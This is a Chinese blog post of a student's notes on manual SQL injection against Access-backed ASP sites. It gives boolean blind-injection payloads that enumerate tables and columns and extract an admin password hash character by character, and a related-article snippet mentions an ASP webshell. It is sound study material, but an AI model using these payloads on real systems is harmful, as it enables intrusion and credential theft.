黑客学习 Access注入 基础部分

最新推荐文章于 2023-10-16 11:47:29 发布
最新推荐文章于 2023-10-16 11:47:29 发布
阅读量266 收藏 3
点赞数
分类专栏: 渗透基础 ctf 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/92436169
版权
学习笔记 同时被 3 个专栏收录
44 篇文章 1 订阅
订阅专栏
渗透基础
16 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 1 订阅
订阅专栏

见识了很多工具,自己把大部分都下载了下来。大部分ctf中能用到的功能也比较容易学。

就快要放暑假了,这是我的大学的第二个学期,相比于第一学期我进步了更多;在实验室的日子大部分都是充实的,坐下来安静的学习,有时在跑神的一小会儿会想起别的,虽然或多或少的影响效率,但思想的发散也算是另一种方式的休息。学习是痛苦的。痛苦伴随着人们的内心的成长。

 

Access注入

注入方法

  • 联合查询法(兼容性差)
  • 逐字猜解法(兼容性好)

联合查询法

联合查询法基本流程

  1. 判断注入
  2. 确定列名的数目
  3. 猜解表名
  4. 猜解列名
  5. 爆出数据

 

逐字猜解法

逐字猜解法基本流程

  1. 判断注入
  2. 查询表名
  3. 查询列名
  4. 先确定长度,再猜解数据

详细步骤

第一步:判断注入

 

  • http://www.xxx.com/news.asp?id=6and 1=1
  • http://www.xxx.com/news.asp?id=6and 1=2

两次返回不一样则存在注入,

我们还可以使用单引号来快速判断注入点。

 

判断数据库

  • and (select count(*) from msysobjects)>0(返回权限不足 access数据库)
  • and (select count(*) fromsysobjects)>0  (返回正常则为MSSQL数据库)

第二步:查询表名

语句and exists (select * from 表名)

语句and exists (select * from admin)

返回正常则说明存在admin数据表。

 

查询表名

第三步:查询列名

语句and exists (select 列名 from 表名)

语句and exists (select admin from admin)

返回正常,则说明存在admin这个列名。

 

查询是否有admin列名

语句and exists (select password from admin)

返回正常,则说明存在password这个列名。

 

查询是否有password列名

第四步:先确定长度,再猜解数据

确定admin列第一行数据的长度。

语句and (select top 1 len(admin) from admin) =5

//top 1子句含义为查询结果只显示首条记录。

//len()取长度

返回正常,则说明admin第一行的数据长度为5。

 

获取admin首行记录内容长度

确定password列第一行数据的长度。

语句and (select top 1 len(password) from

admin) =16

返回正常,则说明password第一列的数据长度为16。

 

获取password首行长度

然后我们逐字猜解数据,逐字猜解我们需要通过用到ASCII表,具体如下图所示:

猜解admin第一列数据内容:

  • 语句and (select top 1 asc(mid(admin,1,1)) from admin) =97 返回正常,第一位为a
  • 语句and (select top 1 asc(mid(admin,2,1)) from admin) =100 返回正常,第二位为d
  • 语句and (select top 1 asc(mid(admin,3,1)) from admin) =109 返回正常,第三位为m
  • 语句and (select top 1 asc(mid(admin,3,1)) from admin) =105 返回正常,第四位为i
  • 语句and (select top 1 asc(mid(admin,3,1)) from admin) =110 返回正常,第五位为n

最终得到数据为admin。

 

猜解password第一列数据内容:

  • 语句and (select top 1 asc(mid(password,1,1)) from admin) =97 返回正常,第一位为a。
  • 语句and (select top 1 asc(mid(password,2,1)) from admin) =52 返回正常,第二位为4。
  • 语句and (select top 1 asc(mid(password,3,1)) from admin) =56 返回正常,第三位为8。
  • 语句and (select top 1 asc(mid(password,4,1)) from admin) =101 返回正常,第四位为e。
  • 语句and (select top 1 asc(mid(password,5,1)) from admin) =49 返回正常,第五位为1。
  • 语句and (select top 1 asc(mid(password,6,1)) from admin) =57 返回正常,第六位为9。
  • 语句and (select top 1 asc(mid(password,7,1)) from admin) =48 返回正常,第七位为0。
  • 语句and (select top 1 asc(mid(password,8,1)) from admin) =102 返回正常,第八位为f。
  • 语句and (select top 1 asc(mid(password,9,1)) from admin) =97 返回正常,第九位为a。
  • 语句and (select top 1 asc(mid(password,10,1)) from admin) =102 返回正常,第十位为f。
  • 语句and (select top 1 asc(mid(password,11,1)) from admin) =99 返回正常,第十一位为c。
  • 语句and (select top 1 asc(mid(password,12,1)) from admin) =50 返回正常,第十二位为2。
  • 语句and (select top 1 asc(mid(password,13,1)) from admin) =53 返回正常,第十三位为5。
  • 语句and (select top 1 asc(mid(password,14,1)) from admin) =55 返回正常,第十四位为7。
  • 语句and (select top 1 asc(mid(password,15,1)) from admin) =100 返回正常,第十五位为d。
  • 语句and (select top 1 asc(mid(password,16,1)) from admin) =51 返回正常,第十六位为3。
  • 最终得到数据a48e190fafc257d3。md5解密得结果:admin888

 

这个用sqlmap会简单很多。

如齐学长所说,大部分的东西都是自己去学,我此刻也仿佛找到了大学大部分时间的归属,有一道题去全身心地投入去做,有一个奖去拼,有一座心中的山去远足,此时此刻我在学习,也算是一件比较幸福的事情了

 

 

 

 

夜车星繁
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ACCESS注入
qq_57307348的博客
02-13 2366
目录 access数据库结构 access数据库类型判断 access数据库需要掌握的几个函数 access注入基本流程 access查询方法 联合查询 布尔型盲注 access数据库结构 表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有若干张表。 access数据库类型判断 根据url文件后缀初步判断,一般asp和access数据库连用,通过and (select count(*) from msys
Access注入
zhuangsle的博客
08-25 689
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
Access注入详细笔记
weixin_46007361的博客
10-10 2145
Access注入
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 1083
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
渗透测试---手把手教你SQL注入(7)---Access数据库注入
最新发布
weixin_52796034的博客
10-16 544
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQL、SQL Server等)在处理SQL注入方面有所不同。
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1805
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
Access数据库手工注入
IerkeU的博客
11-28 1732
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP的
access注入入门
weixin_42109829的博客
12-14 225
文章内容 1.判断注入. and 1=1 and 1=2 或者 -0 -1 看页面的变化 #若带入 and (select count(*) from msysobjects)>0 #由于msysobjects表在access数据库中无权访问所以返回错误--为access数据库 http://219.153.49.228:43394/new_list.asp?id=1 and (select count(*) from msysobjects)>0 #错误是因为没有权限 #若带入an
mysql 密码注入_数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
weixin_33600816的博客
01-27 594
另类登录注入形式:经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。猜解思路可以构造,user_name: xxx'and password>'a 如果passw...
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1090
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
asp+access注入网站源码
02-19
个人博客:实战初级SQL注入-access篇,所涉及的网站源码,如有侵权冒犯,请联系我。
SQL注入Access注入 (手工)
12-14
什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 —-百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入点)之后呢,我们需要判断当前页面是否存在注入 传统的方法是: 语句 状态 链接后面加 ’ 报错 and 1=1 正常 and 1=2 报错 or 1=2 正常 or 1=1
Access数据库及注入方法
谢公子的博客
01-14 1万+
目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软Office家族的一个成员。Acces...
墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问题)
weixin_43071873的博客
09-20 902
进入靶场,测试一下,输入and 1=1 ,提示操作被记录 数据被直接保存在数据库,可以考虑直接把一句话木马传上去 直接传,发现一句话木马没被传上去, 将木马进行url编码一下传入。 使用御剑查找后台。 上菜刀 PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问题
墨者学院 SQL手工注入漏洞测试(Access数据库)
痴人说梦梦中人
11-13 313
1、 判断注入点,求主查询列数,order by 4不报错,by3报错。 2、 猜解数据库,登陆获取key 3、 修复建议 对sql语句进行以下处理: ①、 sql语句预编译 ②、 检查变量数据类型和格式 ③、 过滤特殊字符 ④、 转译特殊符号 ...
SQL注入原理-手工注入access数据库
Unitue_逆流
01-24 5186
一、Target: SQL注入原理、学习手工注入过程 二、实验原理:通过把SQL命令插入到web表单提交或输入域名或页面请求的的查询字符串,最终达到欺骗服务器执行恶意的SQL命令 1、在结尾的链接中依次添加【’】和【and 1=1】和【and 1=2】判断网站是否存在注入点 2、添加语句【and exists(select*from admin)】根据页面返回结果来猜解表名 3、添加【a
Access数据库注入详解
weixin_46601374的博客
04-03 530
一个人再冷酷无情,他曾经都单纯过。能有这样的结果,都是被逼的。 渗透入坑学废集前言注入漏洞分析网站分类常见数据库网站访问模型漏洞成因注入漏洞是怎么样形成的?常见的注入流程注入危害ACCESS数据库注入详解ACCESS数据库介绍优势缺陷asp链接access数据库打开工具数据库查询分析Access数据库注入原理漏洞判断判断数据库注入ACCESS注入番外篇测试站点常用注入工具Access数据库高级玩法偏移注入用*代替字段长度带入计算公式偏移注入跨库查询利用access写入文件利用Access注入执行系统命令挖
【墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1139
背景介绍 安全工程师&amp;quot;墨者&amp;quot;最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
kali linux下nmap的使用
热门推荐
夜车星繁的博客
05-26 1万+
nmap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。  其基本功能有四个: 主机发现(Host Discovery) 端口扫描(Port Scanning) 版本侦测(Version Detection) 操作系统侦测(Operating System Detection) 主机扫描: 1)-sL 列表扫描:可以对主机进行反向域名解析,校验i...
菜鸟黑客入门:基础知识与学习路径
"菜鸟变黑客终极教程"是一份针对初学者的指南,...这是一份旨在帮助菜鸟黑客建立扎实基础,培养持续学习习惯,逐步成长为专业黑客的教程,提醒读者要有耐心和毅力,因为在这个领域,不断的学习和实践才是成功的关键。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值